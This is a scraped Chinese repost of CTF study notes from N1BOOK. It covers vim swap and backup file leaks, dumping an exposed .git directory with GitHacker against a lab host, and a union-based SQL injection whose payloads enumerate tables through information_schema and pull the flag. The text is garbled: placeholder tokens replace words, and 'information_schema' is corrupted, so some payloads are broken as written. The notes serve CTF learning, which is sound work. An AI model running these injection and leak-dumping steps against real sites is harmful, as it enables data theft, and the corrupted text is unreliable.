大佬教程收集整理的这篇文章主要介绍了N1BOOK 记录,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
参考《从0到1 CTFer成长之路》
filename~
,比如index.PHP~
@H_502_12@
.filename.swp
或者*.swo
或者*.swn
,比如.index.PHP.swp
@H_502_12@
/index.PHP~
/.index.PHP.swp
会即刻下载备份文件,可通过vi index.PHP
建@L_197_14@只有空格的文件,然后通过vim -r index.PHP
进行恢复即可得到/robots.txt
git泄露
git clone https://github.com/WangYihang/GitHacker.git
@H_502_12@
cd GitHacker
@H_502_12@
python Githacker.py http://0fcbe3ec-471a-452a-9e5f-953c5026eb18.node3.buuoj.cn/.git
cd 0fcbe3ec-471a-452a-9e5f-953c5026eb18_node3_buuoj_cn_
,有个index.htmlid=1+1
的回显,发现和id=1
结果相同,所以不是数字型注入,可能是字符型id=1a
发现和id=1
结果相同,所以确实是字符型id=1'#
,单引号用于闭合前面的单引号,井号用于注释后面预置的单引号。这里注意:#一定要用URL编码,即%23,所以实际上需要输入id=1'%23
单引号会被自动转成%27id=-1'union SELEct 1,2,3%23
,其中-1是为了使第一行记录无法被@L_262_40@到,当然,除了-1也可以是@L_197_14@很大的值比如1024、100等。后面的@L_262_40@语句是尝试测试哪些字段可以回显参考GROUP_CONCAt(table_Name)
,GROUP_CONCAt
是用,
联合多行记录的函数。所以为@L_262_40@本数据库的其他所有表名,需id=-1'union SELEct 1,GROUP_CONCAt(table_Name),3 from information_scheR_675_11845@a.tables where table_scheR_675_11845@a=database()%23
,随即看到fl4gid=-1'union SELEct 1,GROUP_CONCAt(column_Name),3 from information_scheR_675_11845@a.columns where table_name='fl4g'%23
id=-1'union SELEct 1,fllllag,3 from fl4g%23
直接拖到ida64反编译即可看到flag
以上是大佬教程为你收集整理的N1BOOK 记录全部内容,希望文章能够帮你解决N1BOOK 记录所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。